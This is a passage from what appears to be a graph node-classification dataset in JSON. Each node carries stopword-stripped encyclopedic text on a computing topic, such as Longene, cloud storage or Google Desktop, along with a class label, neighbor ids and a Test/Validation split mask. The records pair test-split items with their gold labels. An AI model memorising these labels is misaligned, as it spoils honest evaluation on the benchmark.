ii island caper spy vs. spy iii arctic antics third game also released ibm pc kept basic gameplay tweaking core features spy vs. spy ii island caper adds side-scrolling play area spies longer start fixed number traps must collect raw materials build spy vs. spy iii arctic antics switches location tropical island arctic spies fight throwing snowballs setting traps decreases body heat bar tools include saw cut holes ice second player fall lost body heat restored moving heated igloo",
    "neighbors": [
      4705,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 8445,
    "label": 3,
    "text": "Longene:longene longene linux-based operating system kernel intended binary compatible application software device drivers made microsoft windows linux 1.0-rc2 consists linux kernel module implementing aspects windows kernel modified wine distribution designed take advantage native interface longene written c programming language free open source software licensed terms gnu general public license version 2 gplv2 although project alpha stage development 2015 many windows programs already work well official website gone august restored 2019 meanwhile source code remains available github longene aims add windows kernel mechanisms including system calls windows registry windows driver model deferred procedure call others linux kernel form new kernel new kernel allow linux windows applications device drivers work without virtualization emulation order prevent bloating function available reactos linux kernel linux implementation used functions implemented using linux loadable kernel modules loaded unloaded easily longene two sets system calls corresponding tables windows syscall set linux syscall set windows applications call syscall table via software interrupt int 0x2e linux applications call syscall table via int 0x80 longene project develop windows linux userland libraries libraries offered others projects wine reactos gnu ndiswrapper september 2005 longene project gained sponsorship insigma technology 浙大网新 china-based consulting corporation project leader decao mao 毛德操 proposed idea route longene wrote series articles market intellectual property rights techniques explain people needed project implement longene articles mao wrote compiled form white paper project according white paper implement longene one needs add several parts linux kernel longene uses wine base implementing windows api project re-implements wine modules use part joint kernel longene defers using wine modules sufficiently implemented project versions longene released several wine modules successfully implemented kernel new stable version used base implementing future modules windows api implemented wine developed modules scratch since longene kernel work windows nt kernel wine userspace kernel emulation wineserver needed device drivers longene imports ndiswrapper kernel modifications made ndiswrapper missing functionality windows driver model using reactos code reference windows driver kit implementation based reactos code uses combination redirecting drivers linux kernel resources additional libraries implement functions implemented linux earlier version unifiedkernel-2.6.13 released february 15 2006 version actualized windows system call mechanism developers currently working longene 2.0 support windows applications running non-x86 architecture hardware arm loongson additionally developers working amd64 support porting ndiswrapper code project yet implemented planned magic linux – magic linux chinese linux distribution based red hat linux version 2.1 magic linux released december 15 2008 includes main version dvd linux kernel 2.6.25.20 compact version cd linux kernel 2.6.25.20 longene version cd longene 0.2.2 minimum hardware requirements run",
    "neighbors": [
      5380,
      6153,
      6797,
      7057,
      10902,
      10016,
      3235,
      7983,
      9009,
      823,
      8262,
      11221,
      1501,
      1632,
      8161,
      1513,
      5356,
      9964,
      9839,
      5363,
      9851,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8446,
    "label": 6,
    "text": "Cloud_storage:cloud storage cloud storage model computer data storage digital data stored logical pools physical storage spans multiple servers sometimes multiple locations physical environment typically owned managed hosting company cloud storage providers responsible keeping data available accessible physical environment protected running people organizations buy lease storage capacity providers store user organization application data cloud storage services may accessed colocated cloud computing service web service application programming interface api applications utilize api cloud desktop storage cloud storage gateway web-based content management systems cloud computing believed invented joseph carl robnett licklider 1960s work arpanet connect people data anywhere time 1983 compuserve offered consumer users small amount disk space could used store files chose upload 1994 launched personalink services online platform personal business communication entrepreneurship storage one first web-based referenced commercials think electronic meeting place cloud amazon web services introduced cloud storage service aws s3 2006 gained widespread recognition adoption storage supplier popular services smugmug dropbox pinterest 2005 box announced online file sharing personal cloud content management service businesses cloud storage based highly virtualized infrastructure like broader cloud computing terms accessible interfaces near-instant elasticity scalability multi-tenancy metered resources cloud storage services utilized off-premises service amazon s3 deployed on-premises vion capacity services cloud storage typically refers hosted object storage service term broadened include types data storage available service like block storage object storage services like amazon s3 oracle cloud storage microsoft azure storage object storage software like openstack swift object storage systems like emc atmos emc ecs hitachi content platform distributed storage research projects like oceanstore vision cloud examples storage hosted deployed cloud storage characteristics cloud storage outsourcing data storage increases attack surface area companies permanent services products provide change outsourcing data storage another company needs careful investigation nothing ever certain contracts set stone worthless company ceases exist circumstances change companies several options available avoid issues one option use private cloud instead public cloud well providers offer private cloud storage another option ingest data encrypted format key hold within premise infrastructure access often use cloud storage gateways premise gateways options encrypt compress data prior transfer well mirror storage across multiple cloud storage providers remove risk single providers shutdown gateways offer well option cache data recently used algorithm premise along data analytics data cached fetched valuable form instead recently used form",
    "neighbors": [
      1539,
      526,
      1551,
      4623,
      2066,
      19,
      10265,
      5662,
      5666,
      9766,
      39,
      5159,
      3121,
      5681,
      5689,
      10820,
      4683,
      590,
      1102,
      7248,
      5202,
      4704,
      4193,
      4194,
      5732,
      7794,
      119,
      2170,
      7802,
      9343,
      2694,
      6280,
      4236,
      10893,
      2703,
      5791,
      2720,
      6307,
      4260,
      5797,
      6309,
      10405,
      2217,
      9906,
      7352,
      4289,
      7874,
      6851,
      3269,
      1224,
      10447,
      3795,
      5848,
      11482,
      2267,
      8413,
      6367,
      2795,
      236,
      2284,
      3819,
      4331,
      9970,
      756,
      253,
      8962,
      8451,
      10504,
      1801,
      272,
      11542,
      2328,
      4377,
      8986,
      11038,
      10020,
      6444,
      8495,
      10032,
      2360,
      3388,
      11581,
      11070,
      8515,
      8520,
      4429,
      1362,
      7512,
      857,
      3428,
      10090,
      8044,
      6514,
      5491,
      5499,
      11646,
      2944,
      6018,
      6023,
      6027,
      911,
      1935,
      8592,
      11156,
      405,
      2965,
      8094,
      6565,
      11178,
      2990,
      4526,
      10670,
      10161,
      10168,
      10681,
      448,
      2496,
      11201,
      9682,
      467,
      10200,
      6618,
      6632,
      1001,
      1516,
      7660,
      11260,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 8447,
    "label": 3,
    "text": "Application_checkpointing:application checkpointing checkpointing technique add fault tolerance computing systems basically consists saving snapshot application state restart point case failure particularly important long running applications executed failure-prone computing systems distributed computing checkpointing technique helps tolerate failures otherwise would force long-running application restart beginning basic way implement checkpointing stop application copy required data memory reliable storage e.g. parallel file system continue execution case failure application restarts need start scratch rather read latest state checkpoint stable storage execute two main approaches checkpointing systems coordinated checkpointing uncoordinated checkpointing coordinated checkpointing approach processes must ensure checkpoints consistent usually achieved kind two-phase commit protocol algorithm uncoordinated checkpointing process checkpoints state independently must stressed simply forcing processes checkpoint state fixed time intervals sufficient ensure global consistency need establishing consistent state i.e. missing messages duplicated messages may force processes roll back checkpoints turn may cause processes roll back even earlier checkpoints extreme case may mean consistent state found initial state so-called domino effect one original common means application checkpointing save state feature interactive applications user application could save state variables data storage medium time using either continue working exit application later time restart application restore saved state implemented save command menu option application many cases became standard practice ask user unsaved work exiting application wanted save work sort functionality became extremely important usability applications particular work could completed one sitting playing video game expected take dozens hours writing book long document amounting hundreds thousands pages work done long period time data entry document rows spreadsheet problem save state requires operator program request save non-interactive programs including automated batch processed workloads ability checkpoint applications also automated batch applications began handle tens hundreds thousands transactions transaction might process one record one file several different files need application restartable point without need rerun entire job scratch became imperative thus checkpoint/restart capability born number transactions processed snapshot checkpoint state application could taken point application failed next checkpoint could restarted giving checkpoint information last place transaction file transaction successfully completed application could restart point checkpointing would tend expensive generally done every record reasonable compromise cost checkpoint vs. value computer time needed reprocess batch records thus number records processed checkpoint might range 25 200 depending cost factors relative complexity application resources needed successfully restart application fti library aims provide computational scientists easy way perform checkpoint/restart scalable fashion fti leverages local storage plus multiple replications erasures techniques provide several levels reliability performance fti provides application-level checkpointing allows users select data needs protected order improve efficiency avoid space time energy waste offers direct data interface users need deal files and/or directory names metadata managed fti transparent fashion user desired users dedicate one process per node overlap fault tolerance workload scientific computation post-checkpoint tasks executed asynchronously future technologies group lawrence national laboratories developing hybrid kernel/user implementation checkpoint/restart called blcr goal provide robust production quality implementation checkpoints wide range applications without requiring changes made application code blcr focuses checkpointing parallel applications communicate mpi compatibility software suite produced scidac scalable systems software isic work broken 4 main areas checkpoint/restart linux cr checkpointable mpi libraries resource management interface checkpoint/restart development process management interfaces dmtcp distributed multithreaded checkpointing tool transparently checkpointing state arbitrary group programs spread across many machines connected sockets modify user program operating system among applications supported dmtcp open mpi python perl many programming languages shell scripting languages use tightvnc also checkpoint restart x window applications long use extensions e.g opengl video among linux features supported dmtcp open file descriptors pipes sockets signal handlers process id thread id virtualization ensure old pids tids continue work upon restart ptys fifos process group ids session ids terminal attributes mmap/mprotect including mmap-based shared memory dmtcp supports ofed api infiniband experimental basis recent protocols perform collaborative checkpointing storing fragments checkpoint nearby nodes helpful avoids cost storing parallel file system often becomes bottleneck large-scale systems uses storage closer found use particularly large-scale supercomputing clusters challenge ensure checkpoint needed recovering failure nearby nodes fragments checkpoints available docker underlying technology contain checkpoint restore mechanism criu user space checkpoint library mementos software system transform general-purpose tasks interruptible program platforms frequent power outages designed batteryless embedded devices rfid tags smart cards rely harvesting energy ambient background mementos frequently senses available energy system decides checkpoint program continue computation case checkpointing data stored non-volatile memory energy become sufficient reboot data retrieved memory program continues stored state mementos implemented msp430 family microcontrollers mementos named christopher nolan memento idetic set automatic tools helps application-specific integrated circuit asic developers automatically embed checkpoints designs targets high-level synthesis tools adds checkpoints register-transfer level verilog code uses dynamic programming approach locate low overhead points state machine design since checkpointing hardware level involves sending data dependent registers non-volatile memory optimum points required minimum number registers store idetic deployed evaluated energy harvesting rfid tag device",
    "neighbors": [
      2051,
      8582,
      5000,
      785,
      7313,
      7699,
      11027,
      7189,
      2710,
      7963,
      6813,
      6815,
      2210,
      5798,
      9126,
      6184,
      2345,
      4909,
      7218,
      10675,
      8501,
      9911,
      5948,
      318,
      4286,
      2113,
      8514,
      5956,
      8262,
      4423,
      1480,
      6909,
      330,
      1866,
      7497,
      8523,
      9677,
      1106,
      10706,
      4308,
      2008,
      344,
      2394,
      731,
      2140,
      2264,
      2910,
      3801,
      11487,
      4194,
      5090,
      11618,
      7142,
      5223,
      2536,
      8554,
      8810,
      4205,
      11125,
      118,
      6263,
      6774,
      3449,
      7802,
      508,
      3197,
      11135
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8448,
    "label": 8,
    "text": "IBM_Unica_NetInsight:ibm unica netinsight ibm unica netinsight web analytics application utilizes extract transform load methodology populate database queried using browser-based interface netinsight family tools unica nettracker affinium netinsight first released june 2006 version 7.0 release version 8.0 affinium netinsight renamed unica netinsight dropping along rest unica products affinium brand ibm acquires unica corporation unica netinsight software adopts ibm name ibm unica netinsight april 2014 ibm announced unica netinsight would discontinued netinsight extract transform load process read log files virtually format including logs web servers proxy servers streaming media servers ftp servers well processing normal server log files netinsight use log files derived page tags replace augment log file data netinsight stores processed log files database oracle database microsoft sql server ibm db2 netezza appliance",
    "neighbors": [
      4640,
      3462,
      5612,
      7983,
      6576,
      2901,
      8470,
      1943,
      11030,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8449,
    "label": 4,
    "text": "CryptoRights_Foundation:cryptorights foundation cryptorights foundation inc. crf 501 c 3 non-profit organization based san francisco cryptorights foundation helps human rights groups ngos use encryption protect online communications contributed encryption standards openpgp ipsec gnupg organization founded 26 february 1998 total solar eclipse near maximum totality active volcanic caribbean island montserrat boat chartered attendees international financial cryptography association conference anguilla dave del torto group fellow ″cypherpunk″ cryptology experts significant technology projects include development highfire human rights firewall distributed communications platform private ngo communications miniaturized pc called firebox size cable modem related highwire wireless human rights communications networking project became open source software defined radio source code maintained gnuradio crf provides free security training support human rights journalism organizations use cryptography crf team also developed gpg plug-in squirrelmail",
    "neighbors": [
      2050,
      8283,
      3742
    ],
    "mask": "Test"
  },
  {
    "node_id": 8450,
    "label": 3,
    "text": "DLX:dlx dlx pronounced deluxe risc processor architecture designed john l. hennessy david a. patterson principal designers stanford mips berkeley risc designs respectively two benchmark examples risc design named berkeley design dlx essentially cleaned modernized simplified mips cpu dlx simple 32-bit load/store architecture somewhat unlike modern mips cpu dlx intended primarily teaching purposes dlx design widely used university-level computer architecture courses two known implementations aspida vamp aspida project resulted core many nice features open source supports wishbone asynchronous design supports multiple isa asic proven vamp dlx-variant mathematically verified part verisoft project specified pvs implemented verilog runs xilinx fpga full stack compiler kernel tcp/ip built original mips architecture one methods used gain performance force instructions complete one clock cycle forced compilers insert no-ops cases instruction would definitely take longer one clock cycle thus input output activities like memory accesses specifically forced behaviour leading artificial program bloat general mips programs forced lot wasteful nop instructions behaviour unintended consequence dlx architecture force single clock cycle execution therefore immune problem dlx design modern approach handling long instructions used data-forwarding instruction reordering case longer instructions stalled functional units re-inserted instruction stream complete externally design behaviour makes appear execution occurred linearly dlx instructions broken three types r-type i-type j-type r-type instructions pure register instructions three register references contained 32-bit word i-type instructions specify two registers use 16 bits hold immediate value finally j-type instructions jumps containing 26-bit address opcodes 6 bits long total 64 possible basic instructions select one 32 registers 5 bits needed dlx like mips design bases performance use instruction pipeline dlx design fairly simple one classic risc concept pipeline contains five stages",
    "neighbors": [
      1798,
      1298,
      6038,
      9371,
      8861,
      10786,
      3493,
      6311,
      682,
      7852,
      4269,
      10796,
      7471,
      2224,
      4144,
      9391,
      1461,
      1462,
      9911,
      8506,
      7234,
      6084,
      3014,
      3142,
      9932,
      6607,
      2517,
      219,
      4955,
      10985,
      9964,
      5358,
      1776,
      4465,
      8048,
      8944,
      372,
      757,
      630,
      2039,
      11125,
      249,
      3451,
      8700,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 8451,
    "label": 1,
    "text": "Amazon_Neptune:amazon neptune amazon neptune fully managed graph database product amazon.com used web service part amazon web services announced november 29 2017 amazon neptune supports popular graph models property graph w3c rdf respective query languages apache tinkerpop gremlin sparql including amazon web services products amazon neptune general availability ga announced may 30 2018 currently available 11 aws regions neptune hipaa eligible december 12 2018 announced amazon neptune in-scope payment card industry data security standard iso compliance programs amazon neptune supports open source apache tinkerpop gremlin graph traversal language w3c standard resource description framework ’ rdf sparql query language used neptune instance allow user build queries navigate highly connected data sets provides high performance graph models neptune also uses aws product features amazon s3 amazon ec2 amazon cloudwatch amazon neptune database clusters created stored amazon virtual private cloud vpc allows user isolate database private network using neptune vpc configuration user configure firewall settings needs order control network access database instances amazon neptune integrated aws identity access management iam allows user create aws iam groups control actions groups aws iam users neptune allows user encrypt databases using keys created aws key management service kms database instance running neptune encryption encrypts stored data backups snapshots replicas cluster amazon neptune allows user use https encrypt data transfer clients neptune service endpoints using transport layer security tls data stored cluster volume virtual volume utilizing ssd drives sizes volumes dynamic increase depending much data stored database maximum 64 tb amazon neptune sla policy designed offer monthly uptime percentage greater 99.9 increasing database performance availability integrating engine virtual storage based ssd drives specially made database workloads neptune maintains copies user data multiple availability zones case failures neptune automatically detects failed segments disk volume repairs neptune generally available us east n. virginia us east ohio us west oregon europe ireland europe london europe frankfurt asia pacific singapore asia pacific sydney asia pacific tokyo asia pacific mumbai asia pacific seoul aws regions pricing determined aws regions region different prices available services on-demand instance pricing lets user pay instance use hour instead fixed sum price also differs depending instance class similarly user pays storage consumed database payments advance price based storage rate i/o rate billed gb per month per million request increments respectively pricing model beneficial short-term small-scale projects available aws regions price backup storage also billed per gb-month increments albeit different rates data transfer priced per gb increments amount depends whether data transferred amazon neptune much data transferred per month tb per month september 12 2018 announced neptune achieved hipaa eligibility enabling process data sets containing protected health information phi december 12 2018 announced amazon neptune in-scope payment card industry data security standard iso 9001 iso 27001 iso 27017 iso 27018 compliance programs user use amazon neptune applications subject pci compliance require iso certification may 17 2019 announced neptune achieved ssae_16 eligibility neptune powers graph use cases recommendation engines fraud detection knowledge graphs drug discovery network security social networking notable customers amazon neptune include samsung electronics pearson intuit siemens astrazeneca finra lifeomic blackfynn amazon alexa",
    "neighbors": [
      5632,
      8962,
      2051,
      6027,
      4236,
      10893,
      911,
      1935,
      4623,
      6161,
      8592,
      2965,
      2328,
      4377,
      8986,
      5660,
      11038,
      9631,
      6307,
      10020,
      11556,
      3366,
      5159,
      8998,
      2217,
      9766,
      939,
      6444,
      3629,
      8495,
      3121,
      7352,
      10681,
      2496,
      4289,
      8129,
      11201,
      6470,
      1224,
      5960,
      8520,
      10185,
      4429,
      590,
      7248,
      1362,
      467,
      9682,
      7512,
      8921,
      11098,
      987,
      735,
      6367,
      4194,
      3171,
      5732,
      6629,
      11646,
      1001,
      10090,
      3819,
      7660,
      8181,
      2170,
      5499,
      124,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 8452,
    "label": 3,
    "text": "Socket_939:socket 939 socket 939 cpu socket released amd june 2004 supersede previous socket 754 athlon 64 processors socket 939 succeeded socket am2 may 2006 second socket designed amd amd64 range processors socket 939 processors motherboards became available june 2004 superseded socket am2 may 2006 amd ceased production socket focus current future platforms however least one new socket 939 motherboard produced utilizing modern amd chipset since amd transitioned socket am2 2009 motherboard maker asrock released new socket 939 motherboard motherboard utilizes amd 785g igp chipset sb710 southbridge single dual-core processors manufactured socket athlon 64 athlon 64 fx athlon 64 x2 sempron opteron names opteron 190 featuring 2.8 ghz clock speed 1 mb level 2 cache per core fastest dual-core processor manufactured socket however availability processor limited opteron 185 locked multiplier athlon 64 fx-60 unlocked multiplier slightly slower clock speed 2.6 ghz fastest widely available dual-core processors socket opteron 156 ran slightly faster 3 ghz making fastest single core processor supporting socket 939 interface socket 939 supports dual channel ddr sdram memory 6.4 gb/s memory bandwidth processors socket support 3dnow sse2 sse3 revision e later instruction sets features one 16 bit hypertransport link running 1000 mt/s regards video expansion slots socket 939 systems found agp slots pci-e slots processors using socket 64kb level 1 instruction data caches either 256kb 512kb 1 mb level 2 cache",
    "neighbors": [
      3586,
      8322,
      3588,
      9475,
      3464,
      4872,
      7058,
      10260,
      4246,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      5326,
      7247,
      9551,
      977,
      7122,
      9427,
      5844,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8453,
    "label": 9,
    "text": "Cerner_CCL:cerner ccl cerner ccl cerner command language cerner corporation fourth-generation programming language expressed cerner discern explorer solution ccl patterned structured query language sql cerner millennium health information technology solutions use ccl/discern explorer select insert update delete cerner millennium database ccl allows programmer fetch data oracle database display user wants see features like record structure subroutines allows us get data database manipulate storing temporary structure execute particular section code required using subroutine complete ccl cerner command language provided cerner corporation discern explorer provides several applications used create execute analyze ad hoc queries reports programs applications provide flexibility skill set needed build programs design reports discern explorer programs written using visualexplorer.exe discernvisualdeveloper.exe dvdev operating system command-line editor text editor explorermenu.exe em used execute discern explorer programs demand exploreranalyzer.exe ea allows users analyze system resources used rdbms queries ccl hello world examples call echo hello world go drop program helloworld2 go drop program helloworld3 go drop program jcmclass1a go",
    "neighbors": [
      8262
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8454,
    "label": 2,
    "text": "Pygame:pygame pygame cross-platform set python modules designed writing video games includes computer graphics sound libraries designed used python programming language pygame originally written pete shinners replace pysdl development stalled community project since 2000 released open source free software gnu lesser general public license pygame uses simple directmedia layer sdl library intention allowing real-time computer game development without low-level mechanics c programming language derivatives based assumption expensive functions inside games abstracted game logic making possible use high-level programming language python structure game features sdl n't include vector math collision detection 2d sprite scene graph management midi support camera pixel-array manipulation transformations filtering advanced freetype font support drawing applications using pygame run android phones tablets use pygame subset android pgs4a sound vibration keyboard accelerometer supported android regular competition called pyweek write games using python usually necessarily pygame community created many tutorials pygame",
    "neighbors": [
      2826,
      3210,
      5914,
      11306,
      7983,
      11700,
      8262,
      4182,
      9691,
      5083,
      477,
      8554,
      5612,
      10480,
      9330,
      9331,
      2804,
      2293,
      6900,
      1916,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8455,
    "label": 5,
    "text": "Google_Desktop:google desktop google desktop computer program desktop search capabilities created google linux apple mac os x microsoft windows systems allowed text searches user email messages computer files music photos chats web pages viewed ability display google gadgets user desktop sidebar september 2011 google announced would discontinue number products including google desktop reason given last years ’ huge shift local cloud-based storage computing well integration search gadget functionality modern operating systems people instant access data whether online offline goal google desktop product discontinued january 2008 google desktop featured following functionality prominent feature google desktop sidebar holds several common gadgets resides one side desktop sidebar available windows linux versions google desktop sidebar comes pre-installed following gadgets like windows taskbar google desktop sidebar set auto-hide mode appear user moves mouse cursor towards side resides auto-hide default sidebar always take 1/6 – 1/9 screen depending screen resolution windows forced resize however sidebar resized take less space users disable always top feature options auto-hide feature sidebar temporarily overlaps maximized windows another feature comes sidebar alerts sidebar minimized new email news displayed pop-up window windows taskbar searching sidebar deskbar floating deskbar google desktop displays quick find window window filled six default relevant results user computer results update user types allows use without open another browser window deskbars boxes enable searching directly desktop web results open browser window selected computer results displayed quick find box see deskbar either fixed deskbar sits windows taskbar floating deskbar may positioned anywhere desktop google desktop includes plugins allow indexing searching contents local microsoft outlook ibm lotus notes mozilla thunderbird email databases outside client applications built-in search functions lotus notes local databases indexed searching google desktop email indexing feature also integrated google web-based email service gmail index search email messages gmail accounts desktop gadgets interactive mini-applications placed anywhere user desktop – docked sidebar – show new email weather photos personalized news google offers gallery pre-built gadgets download official website developers google offers sdk official blog anyone wants write gadgets plug-ins google desktop automated system creates developer hierarchy called google desktop hall fame programmers advance based gadgets number popularity sdk also allows third-party applications make use search facilities provided google desktop search example file manager directory opus offers integrated google desktop search support even though desktop search programs search files meta data google desktop windows one uses title tag results lists files linux shows meta-data html files pdf files programs use file names results lists use title tag gives significantly better user experience since metadata titles present written ordinary language file names less communicative title meta data missing file google desktop reverts use filename google desktop originally developed bring google search technology desktop google desktop received much attention may allow reverse engineering google proprietary search algorithm centrally administered version integrates user experience vendor appliance exists well google desktop officially discontinued september 14 2011 february 2007 yair amit watchfire found series vulnerabilities google desktop could allow malicious individual achieve remote persistent access sensitive data cases full system control well significant impact ease exploitation forced google change google desktop logic google desktop version 5 many privacy civil liberties groups electronic frontier foundation eff concerns personal information people computers could readily copied users hard drives google desktop version 3 contains certain features raise serious security privacy concerns specifically share across computers feature introduces ability search content desktop desktop greatly increases risk users privacy google desktop v.3 set allow search across computers files indexed computer copied google servers potential information stored computers accessed others enable feature google desktop v. 3 computers seriously considered eff advises using feature also confidential data work home computers enable feature privacy laws company policies could violated installation feature specifically sb 1386 hipaa ferpa glba sarbanes-oxley far reaching concerns arise around packaging end user license agreement – specifically level intrusion local machine disclaimers users implicitly agree future changes license agreement without actually able see immediately issues microsoft outlook indexing deleted email listings removed required re-installing google desktop new archived mail listed several versions released patch outlook indexing first half 2009 large number google desktop users reported product stopped indexing suddenly index file reached approximately 4gb size full uninstall including manually deleting indexes reinstall would fix problem temporarily problem would recur index file reached 4gb problem resolved google desktop search version 5.9 currently google desktop index email contacts outlook 2010 default google desktop index email thunderbird 3",
    "neighbors": [
      4995,
      5892,
      3462,
      8455,
      7816,
      9353,
      6797,
      5262,
      8719,
      6035,
      5524,
      7700,
      6550,
      8471,
      10645,
      8858,
      1435,
      11418,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      5677,
      7983,
      1203,
      1077,
      823,
      5431,
      10173,
      7359,
      196,
      3269,
      3782,
      11590,
      4683,
      11343,
      3664,
      6993,
      3795,
      1240,
      8413,
      6367,
      2658,
      487,
      6632,
      3561,
      5483,
      236,
      5612,
      9712,
      9970,
      8821,
      3836
    ],
    "mask": "None"
  },
  {
    "node_id": 8456,
    "label": 3,
    "text": "Scramble_Formation:scramble formation game player controls red propeller-driven airplane flying city tokyo able shoot capture red smaller planes follow player formation player choose 3 formations first able shoot air-to-air air-to-ground projectiles second air-to-air larger area third air-to-ground larger area well gameplay player react accordingly threats quickly decide one 3 formation types adequate one given moment game divided areas depicting key places tokyo shinjuku akasaka ginza clearly defined levels points player faced giant mothership shot hitting engines port released msx 2 home computer 1987",
    "neighbors": [
      1776
    ],
    "mask": "None"
  },
  {
    "node_id": 8457,
    "label": 7,
    "text": "Database_of_Molecular_Motions:database molecular motions database macromolecular motions molmovdb bioinformatics database software-as-a-service tool attempts categorize macromolecular motions sometimes also known conformational change originally developed mark b. gerstein werner krebs nat echols molecular biophysics biochemistry department yale university since introduction late 1990s peer-reviewed papers database received thousands citations database mentioned news articles major scientific journals book chapters elsewhere users search database particular motion either protein name protein data bank id number typically however users enter database via protein data bank often provides hyperlink molmovdb entry proteins found databases database includes web-based tool morph server allows non-experts animate visualize certain types protein conformational change generation short movies system uses molecular modelling techniques interpolate structural changes two different protein conformers generate set intermediate structures hyperlink pointing morph results emailed user morph server originally primarily research tool rather general molecular animation tool thus offered limited user control rendering animation parameters color point view original methods sometimes required fair amount cpu time completion since initial introduction 1996 database associated morph server undergone development try address shortcomings well add new features normal mode analysis research grounds subsequently developed alternative systems moviemaker university alberta bioinformatics vendor dnastar incorporated morphs database commercial protean3d product connection dnastar authors database immediately clear",
    "neighbors": [
      467,
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 8458,
    "label": 9,
    "text": "KnowledgeMan:knowledgeman knowledgeman early computer database management system created micro data base systems lafayette indiana knowledgeman introduced 1983 pc-sized version company mainframe computing database software knowledgeman promoted users dbase faster database using sophisticated computing power macro language sql structured query language allowed reports spreadsheet interface statistical graphics i.e. pie charts bar charts etc knowledgeman designed david bartkus knowledgeman first database management system ported mainframe system also first written 16-bit pc processor knowledgeman first separate database engine command interface something microsoft access lauded decade later micro data base systems developed graphical user interface knowledgeman frequently called kman 1985 although popular developers preferred use software command line interface 1986 introduced guru expert system incorporated knowledgeman database graphical user interface mid-1990s knowledgeman folded guru 2004 micro data base systems folded product line taken savitar corporation savitar folded 2008 besides uses business computing knowledgeman used archaeologists including neanderthal site france remains new amsterdam new york city elsewhere physicists fermilab wide range domains",
    "neighbors": [
      7523,
      10413,
      4614
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8459,
    "label": 4,
    "text": "Brian_LaMacchia:brian lamacchia brian a. lamacchia computer security specialist lamacchia best known work massachusetts institute technology establishing mit pgp key server first key centric pki implementation see wide-scale use lamacchia wrote first web interface pgp key server lamacchia currently works microsoft director security cryptography microsoft research previously director security cryptography microsoft extreme computing group played leading role design xkms security architecture .net palladium designed led development team .net security architecture security architect palladium most-referenced work .net framework played leading role design w3c xmldsig xkms standards particular author versions 1.0 1.1 2.0 xmldsig contributor xkms coauthor oasis standard ws-security lamacchia earned s.b. s.m. ph.d. degrees mit 1990 1991 1996 respectively primary community activity involvement seattle international film festival treasurer 2013 currently president",
    "neighbors": [
      10831,
      4435,
      8283,
      5372,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8460,
    "label": 8,
    "text": "Apache_OJB:apache ojb apache objectrelationalbridge ojb object/relational mapping tool allows transparent persistence java objects relational databases released april 6 2005 january 16 2011 apache objectrelationalbridge retired ojb open source project lightweight easy use requiring simply configure two files implement persistence layer easy integrate existing application generate code allows use different patterns persistence owner persistencebroker api jdo object data management group odmg ojb uses xml based object/relational mapping mapping resides dynamic metadata layer manipulated runtime simple meta-object-protocol mop change behaviour persistence kernel least two files required configure ojb ojb.properties repository.xml mapping 1-1 relationship example two tables person account case person account vice versa",
    "neighbors": [
      10377,
      7567,
      1296,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      7983,
      4919,
      5047,
      4538,
      1851,
      7485,
      7742,
      9789,
      7233,
      6338,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      9286,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      7159,
      1913,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 8461,
    "label": 6,
    "text": "Specfs:specfs unix-like computer systems specfs short special filesystem physical network file system mount point either simply filesystem layer access device special files hosted regular filesystems",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      6403,
      11012,
      2314,
      6416,
      1810,
      5397,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8462,
    "label": 4,
    "text": "Certified_Penetration_Testing_Engineer:certified penetration testing engineer certified penetration testing engineer c pte internationally recognized cyber security certification administered united states-based information security company mile2 accreditation maps committee national security systems 4013 education certification c pte certification considered one five core cyber security certifications obtaining c pte certification requires proven proficiency knowledge five key information security elements penetration testing data collection scanning enumeration exploitation reporting c pte certification one several information assurance accreditations recognized u.s. national security agency certification also approved u.s. department homeland security national initiative cyber security studies careers nicss u.s.-based national security systems committee online exam c pte accreditation lasts two hours consists 100 multiple choice questions",
    "neighbors": [
      10717,
      10307,
      357,
      8613,
      9607,
      7528,
      7228,
      7887,
      8462,
      5010,
      6834,
      1493,
      3447,
      6105,
      316,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8463,
    "label": 9,
